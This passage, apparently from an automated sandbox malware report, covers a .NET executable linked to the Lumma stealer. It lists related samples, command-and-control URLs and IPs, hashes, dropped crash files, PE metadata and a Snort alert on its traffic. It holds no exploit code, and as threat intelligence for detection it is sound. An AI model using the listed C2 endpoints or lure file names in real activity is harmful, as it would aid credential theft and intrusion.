	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.annaregas.com/k13s/?xFNH=2R6J1Mwk1pXyKYVwhkNlxjJ8v1RhkSyBe6EME6YyhIZ0/Nga8Zv4MU94dVSKxLe47F9d&zL08lr=ejlHNdbXg
	specifik#U00e1ci#U00f3k.xls	Get hash	malicious	FormBook	Browse	www.grmlfgsz.click/pta7/?Iv=ZUw0DE2tTfMrS/vGyxuieLl6kaDP4oTJFCKtS8euE2iaohDcpFUZC4QpBbwyViCfiPHxoQAr+wVp689ioFi7f5fgi3TjeDS/z8BEKe8=&wDlhgT=ChaYXozdAlwb1SV
	scGanV8c88.exe	Get hash	malicious	FormBook	Browse	www.gtma10.vip/c3bm/?JS_8C7D=krCldiLgjcApKXxrGjhuaKpz6ZHvYhZGq0ZIJRxCzMFoz9nWr9LtpAXVljRcNxh/nVbbku+Fmqa2xbVL9lcLNTxpm3PzxzrMAA==&ivqyHH=ycS5CtM8hGt67IyN
	PAYMENT_DETAILS.xls	Get hash	malicious	FormBook, NSISDropper	Browse	www.guvenilirdamgasi.org/qpcj/?d2Y3o=CLt5b4nVfHN0cUD8LiUhEGsHj/mKirkDBEtfJybA3Pc6UVEGYUZBd7AfTSRLxjGxXde0YLIu/yd5JvFAW8H/jC1EjaCNxooVlWgY9nI=&Rh=DWhbDle
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	gstatic-node.io/c2sock
	vHcolmNDrx.exe	Get hash	malicious	LummaC Stealer	Browse	gstatic-node.io/c2sock
	qhfsVF2oUF.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.emeeycarwash.com/sy22/?l2Md=idWz9iPt5djOAZRx7cnCD/xpUTTFozVhxOaydIDFqIpkj01++CgT1VCwJAO79rhd+nHJ&4hUHW=cVCdVHHX
	SWIFT_COPY.docx.doc	Get hash	malicious	Unknown	Browse	chilp.it/blocked.php
	Bill_of_lading.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.ahevrlh.xyz/sn26/?FRcPk=K4V3qd/IU4ffH94qwwuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUi1xqYuvMH6I&k2J=q6A8ur
	jeB6vVWLIf.exe	Get hash	malicious	FormBook	Browse	www.ohrana-truda-truda-rf.online/ge83/?nTFxoxtH=2nm9SBzH0Hx5NnWQX6GJHPtsi8QD7hmQKbTe2pBvLN9cPybUuxvo4q4aMsergVSi0iFd&k6B=2dotn
	UEWorS19Ku.exe	Get hash	malicious	MinerDownloader, LummaC Stealer, Xmrig	Browse	gstatic-node.io/c2sock
	1cDoXMFh1E.exe	Get hash	malicious	LummaC Stealer	Browse	gstatic-node.io/c2sock
	DypP.hta	Get hash	malicious	FormBook	Browse	www.ra89.info/oi24/?4hhH1t5H=Wh4wjnvEFEjN1Vcvh06yLqvba86PLQUGZsfVJU7KYL4duzqIEgCkKeFQBw6hAkdKG6D5&qXYPeb=ltxdAvvxHF_txf10
	qWPmliKXpb.exe	Get hash	malicious	DarkTortilla, LummaC Stealer, XWorm	Browse	gstatic-node.io/c2sock
	aM2keVo29a.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	deadpip.xyz/c2sock

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gstatic-node.io	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	188.114.97.7
	vHcolmNDrx.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	UEWorS19Ku.exe	Get hash	malicious	MinerDownloader, LummaC Stealer, Xmrig	Browse	188.114.96.7
	1cDoXMFh1E.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	qWPmliKXpb.exe	Get hash	malicious	DarkTortilla, LummaC Stealer, XWorm	Browse	188.114.97.7
	HH1QmcnOwo.exe	Get hash	malicious	CryptOne, LummaC Stealer	Browse	188.114.96.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.53
	SecuriteInfo.com.Trojan.GenericKD.68531053.31697.15992.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	P6wZPsI7iT.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine	Browse	188.114.96.7
	poG9A9xtE6.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine	Browse	188.114.97.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	cHQhnnXraj.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.7
	oCCFAL5B1C.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	188.114.96.7
	3tOqxjr1rk.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	LiUvsDzAM5.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Maerskline_Invoice_K22TSI71581.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	DHL_AWB_2506307661.exe	Get hash	malicious	FormBook	Browse	188.114.97.7
	DlXCfRPdLr.rtf	Get hash	malicious	FormBook	Browse	188.114.96.7
	DHL_AWB_45000289001.exe	Get hash	malicious	FormBook	Browse	188.114.97.7
	N._de_pedido_Z21239.exe	Get hash	malicious	AgentTesla	Browse	162.159.133.233
	ljaaBSpstQ.rtf	Get hash	malicious	FormBook	Browse	23.227.38.74
	hesaphareketi-01.pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.7
	McKenna Ed shared _Document_ with you.eml (17.3 KB).msg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	http://acaciahillhomes.com/kila.php	Get hash	malicious	HTMLPhisher	Browse	188.114.97.7
	https://bafkreifro3wvuzg5u54b56tbi7r3bh5vkoe3xjkifiqcruea6n5hnckncq.ipfs.dweb.link/#	Get hash	malicious	HTMLPhisher	Browse	188.114.97.7
	https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=TEoNDfxl_E2Txt1S-oRSlxJtQiyHLpNOrYOL8dhHXOlUQktRUE82NUFBSzVVMjlFTTFTRktPQ1c3US4u	Get hash	malicious	Unknown	Browse	104.18.16.182
	4Y8g0J8rBt.exe	Get hash	malicious	FormBook	Browse	188.114.96.7
	TERMS.doc	Get hash	malicious	Unknown	Browse	23.227.38.74
	8VAmuS09tt.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.232
	7ZLS7t6RdA.exe	Get hash	malicious	FormBook	Browse	172.67.148.168
	https://www.baidu.com/link?url=VW7H86BIOYkLVbXomLBGOc51nbFrYWJ07yhNocnD2PNXjIrRCViQ_xyoUreVUqic#cmZvdXNoZWVAcGVyc29uY291bnR5bmMuZ292	Get hash	malicious	HTMLPhisher	Browse	104.21.85.186
	Paystub.html	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Past Due.xlsx	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.linkedin.com/slink?code=eNJeg_vx#ZGFucGV0aXRAZGVsb2l0dGUuY2E=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.7
	sm46NqECwv.exe	Get hash	malicious	FormBook	Browse	188.114.97.7

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_31b14ea8eef64207fa147982c8a3c8467e2c79d_b7751e98_1a54ed59\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9394152947703281
Encrypted:	false
SSDEEP:	192:P2lHPVUKGGtF5HBUZMXwjMjP/u7sQS274Itl:SPHxBUZMXwjA/u7sQX4Itl
MD5:	C96E8242751BB99C65DDCCA934072554
SHA1:	0375DCBBFB613C6436C12006F3B21D8C4E9C042B
SHA-256:	227E2986842A1A91E913742A6CFA27C7C34FA8129DFED39C91835E258EE9E938
SHA-512:	67A55B9A87346E1EA52FAB1DC182755D5C99FF737358661CF7337E278EF9B821C830947B62E828E2386F4216DF2B0EFCEC3F67D1C0D7321335B591E992046BC6
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.6.8.1.6.3.5.6.0.5.6.4.4.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.6.8.1.6.3.5.6.6.3.4.5.5.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.f.f.0.a.1.5.-.6.5.1.f.-.4.f.8.5.-.9.9.b.c.-.1.8.3.a.a.b.2.f.f.6.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.6.3.6.0.f.4.-.1.8.6.3.-.4.f.3.8.-.b.c.5.a.-.6.f.3.e.f.0.7.5.5.2.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.1.0.-.0.0.0.1.-.0.0.1.f.-.1.a.a.d.-.9.6.5.c.a.3.d.1.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.2.d.0.c.4.8.6.b.c.5.4.2.2.d.4.e.7.6.0.2.c.e.3.4.9.a.f.2.f.0.0.d.e.7.a.2.6.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE635.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Aug 18 07:12:36 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	93012
Entropy (8bit):	2.07672226096538
Encrypted:	false
SSDEEP:	384:WbE2+fIZyCmPAVXTsTijfjt6ZvkMKyJxCfsV7lDJ84J1rVVZNAXn6:WzZyCmGgrZvkMKyJTfH2X6
MD5:	9406AA672E5A30988425C94A9CEF2B4E
SHA1:	02D4F3E7566C3483CC7B7DF18BBB8B49FD838DDF
SHA-256:	8BFA1810D321EDFC960B4DB09BC8B8DC7EE9AD74AC9EDA141336622AFA2C4780
SHA-512:	9CCAA19C8D6A709D8302869D9C3AA06CF6F598CF3771D0B1886C5A61845842B8C63BE5201A7D568FC5E22285290CD3EE784D425DC132A8BCB3ACA934BBE08FBC
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........d....................................<...p...........(>..........`.......8...........T................<...........................................................................................U...........B......0.......GenuineIntelW...........T..............d.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7CD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8286
Entropy (8bit):	3.6951652053871458
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNipJ6BB6YU9o6Bm2gmfGd5SVCpra89bpncsfkH9Dm:RrlsNin6n6Yx6HgmfQS+pnvfEE
MD5:	04CE4197DA8BDF1531E97D56169B682B
SHA1:	C79AAE4B19425954F3CC75C9242BCB81EA60008E
SHA-256:	BA75551B6E8DEA541F51786D3DEEAAECD3B1E984902DA94560A82E5D0CE5B097
SHA-512:	C7533068ADE9F5C60DE62C292501443AE2C215EA598799A38C7E4B9AC9988C77D6A76DABAEBDB75640B63416EC3D16468D2685AB6C2F7E9D75BA568328805E31
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.7.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE80C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4620
Entropy (8bit):	4.445534686857734
Encrypted:	false
SSDEEP:	48:cvIwSD8zshJgtWI993hWgc8sqYjq8fm8M4Jh8qFA+q8+HCBfFKrJd:uITfzuggrsqYDJWbjCBfMrJd
MD5:	E8A752F91449C5C6946B9EED500C0E3E
SHA1:	75E4E06E55E711CA6DAFBC89C88490F0E27CA9F9
SHA-256:	D40F28E844FB05B770521DA8AA48DCE0AED6451E33CB88CD605D4FEC29A8244E
SHA-512:	ECDDDC2568DFEBCA1974DDDD6EC403165FB45C0D6A059B3FF3874E3224743E8A4B51791C8CEE87C2B49577CF6A8988E437A1C80B8980DEEEB33B05CF8069CA1F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2178263" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FT0uDS8neB.exe.log

Download File

Process:	C:\Users\user\Desktop\FT0uDS8neB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.36138700684261
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPQfOKbbDLI4MWuPJK4EWPAqDcnTTJKhav:MLU84qpE4KI2KDE4KhKYIqDcfJKhk
MD5:	C2C8B3AAEB77E2DF060A3E284CEA4D3F
SHA1:	D3959A28A15B7FE8C5DBB86288D80FF723D0D2D9
SHA-256:	63C9A133FCB15548FD22760BDA5FDE73BF5D943626A7D2480978BDE0FEBF4189
SHA-512:	B19994BB683286360C08F08C5CDC15E6A2AF9350829246F2B4FD69E6C139F1185D2C8D31D6E31012449BA694241E02F880AFB0C40FB1424A0FE265C3DCA33E80
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.351496061536473
Encrypted:	false
SSDEEP:	12288:/hUzoyoTwdcBdovor/W88n8bOv/iLkt8/ijJzSqUPspK/+BtRa5x8FT:pUzoyoTwdcjovoVqjz50
MD5:	0B4BE1C62BC243095B2314523A1F2DC0
SHA1:	5F9FF1FCD9D2A152998A75DF96F752E552326322
SHA-256:	873C75321A54DF02E3A5760D7E101103834CCB379B8B25346C38800FC3C81BCA
SHA-512:	B9EC97A9295BBA623D5A726C50DB13F5DB376A421B5E94383C8D0BA73E7A904E7B0C934E922D5D1CC9225CC37720AF11F339C206DDACBFEABCB0C43BD058A360
Malicious:	false
Preview:	regfj...j...p.\..,.................. ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn..].................................................................................................................................................................................................................................................................................................................................................x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.864503611855815
Encrypted:	false
SSDEEP:	384:FG55vzX0mnUUfRMA7CpnXuM3g4z/vGSGunVDigfoEAH6Jphf1oJ1BmE/d:FsvzX3nUUfi6wXuM3g4z/vGnuVDigfoj
MD5:	5D8155E5B59F486EA6F93BAF8F860285
SHA1:	E2264411381A6399271A46B6BEDA4CB6ADA6F808
SHA-256:	591636B8C71A4F78906584495895BFBDB58488D98575D7DEDBE8C757FE5304FB
SHA-512:	6343935F3322B97493203AC5BA7081211E58C347BD5D8B394A7B9993D170DDDA9EA8A691D0341492FA77CF089BEA5191945E8A05C2AE1FF9E9C7979B03810F87
Malicious:	false
Preview:	regfi...i...p.\..,.................. ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn..].................................................................................................................................................................................................................................................................................................................................................x..HvLE.^......i....`......+.S.7b....]Z..\|..........`...............@... ..hbin................p.\..,..........nk,....]........P........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....]........ ........................... .......Z.......................Root........lf......Root....nk ....].....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.900939534337635
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	FT0uDS8neB.exe
File size:	1'369'600 bytes
MD5:	e6b8cfb15c6fce9abcea7a716345d537
SHA1:	c56b60c650439c124b403e31aced45c584ecdd7b
SHA256:	6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277
SHA512:	e0163f07a996590e04340b61c3facbc2b5030936028f2ae6bb648b57fadaf2a74d2e8aea29a6eb1b6ff33058feb878f5003609b4bba018c7312c5762f1c84cc1
SSDEEP:	24576:fk+bHOG7WsijczZPUIuAYfc48SCkbNY/:s+buG7B6cmHAYfgsY
TLSH:	17556BD53F9D5A60E529F67ACAC7608B13B5F1D72222E5272FCB02C94211B851FD2CAC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D/w...............P.................. ... ....@.. .......................@............@................................

File Icon


Icon Hash:	13fbfbfbfb30d032

Static PE Info

General

Entrypoint:	0x511fbe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBB772F44 [Sat Aug 31 04:51:16 2069 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
mov byte ptr [eax], al
add byte ptr [eax+00000010h], al
mov al, byte ptr [18800000h]
add byte ptr [eax], al
add byte ptr [eax+00800000h], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [ecx], al
add byte ptr [eax], al
add al, dl
add byte ptr [eax], al
add byte ptr [edx], 00000000h
add byte ptr [eax], al
call 00007F007C899C05h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax+eax], 00000000h
add byte ptr [eax], bl
add dword ptr [eax], eax
add byte ptr [30000000h], 00000001h
add byte ptr [eax+00000006h], al
dec eax
add dword ptr [eax], eax
add byte ptr [edi], 00000000h
add byte ptr [eax], al
pushad
add dword ptr [eax], eax
or byte ptr [eax], 00000000h
add byte ptr [eax], al
js 00007F0079099C03h
add byte ptr [eax+00000009h], al
nop

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x111f70	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x112000	0x3e0f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x152000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x111f22	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x10ffc4	0x110000	False	0.7006171731387868	data	6.967152206152922	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x112000	0x3e0f4	0x3e200	False	0.6891505281690141	data	6.4228390144268594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x152000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1122b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m	0.7960992907801419
RT_ICON	0x112718	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/m	0.6864754098360656
RT_ICON	0x1130a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m	0.6303939962476548
RT_ICON	0x114148	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m	0.5840248962655602
RT_ICON	0x1166f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m	0.5478271138403401
RT_ICON	0x11a918	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 11811 x 11811 px/m	0.5346580406654344
RT_ICON	0x11fda0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 11811 x 11811 px/m	0.5186567164179104
RT_ICON	0x129248	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/m	0.48592215781379394
RT_ICON	0x139a70	0x160b5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	1.0003987020034775
RT_GROUP_ICON	0x14fb28	0x84	data	0.7272727272727273
RT_VERSION	0x14fbac	0x35c	data	0.40232558139534885
RT_MANIFEST	0x14ff08	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6188.114.97.749718802046637 08/18/23-00:12:35.724385	TCP	2046637	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt	49718	80	192.168.2.6	188.114.97.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2023 00:12:35.484853029 CEST	49717	80	192.168.2.6	188.114.96.7
Aug 18, 2023 00:12:35.503599882 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.503730059 CEST	49717	80	192.168.2.6	188.114.96.7
Aug 18, 2023 00:12:35.504090071 CEST	49717	80	192.168.2.6	188.114.96.7
Aug 18, 2023 00:12:35.521923065 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532723904 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532757044 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532777071 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532799006 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532818079 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532828093 CEST	80	49717	188.114.96.7	192.168.2.6
Aug 18, 2023 00:12:35.532830000 CEST	49717	80	192.168.2.6	188.114.96.7
Aug 18, 2023 00:12:35.532887936 CEST	49717	80	192.168.2.6	188.114.96.7
